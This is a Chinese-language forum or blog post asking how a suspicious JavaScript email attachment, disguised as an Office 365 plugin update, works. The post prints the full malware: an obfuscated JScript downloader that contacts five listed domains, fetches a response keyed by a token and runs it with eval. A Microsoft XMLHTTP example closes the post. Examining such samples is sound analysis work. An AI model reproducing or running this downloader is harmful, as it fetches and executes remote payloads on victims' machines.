逆向工程 - 可能是恶意的 Javascript-对其工作方式感兴趣 - 吾爱随笔录

在一封名为“Install-MSOffice365-WebView-Plugin-Update-0.165.11a.exe.js”的电子邮件中压缩了这段有趣的代码，这无疑是恶意的，但很好奇它的作用是什么，并不是一个 Javascript 编码器。

function abatae(beeraa) {beeraa.send();}
function greezno() {return 'COUNQWTER'.replace(/QW/g,"");}
function hust(rasp){eval(rasp);}
var x = ["gunbobinaj.com","www.apbfoundation.com","blog.enertres.com","kimyaalemi.com","alto-krvavica.hr"];
var mink = 0;
var mumik = new Array('GE'+'T');
var mustafa = x.length;
while(true)
{
    if(mink>=mustafa)
    {
        break;
    }
    try
    {       
        var lumin = new ActiveXObject("MSXML2.XMLHTTP");
        var zemk = '00000012Qi9ag1Lxi5WL5GYeqMUKg4dxY3wxqiSvY5p7zea6RhRlNYyPH5MZDQTqCM-SWpbTQcFystPcok-Ndq9EPbeFOaoUCWQf9OpN1waFD0-V9ZIty6Lgyw_hRmV0Cj0dW7c1yX1IRnw0';
        var ghyt = false;
        var gerlk = x[mink];        
        lumin.open(mumik[2-2], "http://"+gerlk+'/'+greezno()+'?'+zemk, ghyt);
        abatae(lumin);
        var gt = lumin.responseText;
        var miffka = gt.indexOf(zemk);
        var pista = gt.length;
        var miluoki = "a";
        if ((pista+0) > (8+1+1) * 100 && 2 == 2 && miffka + 2 > 1) 
        {
            var kichman = rizma(gt, zemk).join(miluoki+"");
            hust(kichman);
            break;
        }
    }
    catch(e)
    {
    };
    mink++;
};
function malysh() {return "htRESMtp".replace(/RESM/g,"");}
function rizma(kjg, lki) {  return kjg.split(lki);}

The following Microsoft® JScript® example creates an XMLHTTP object and asks a server for an XML document. The server sends back an XML document, which is then displayed in a message box. var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.6.0"); xmlHttpReq.open("GET", "http://localhost/books.xml", false); xmlHttpReq.send(); WScript.Echo(xmlHttpReq.responseText);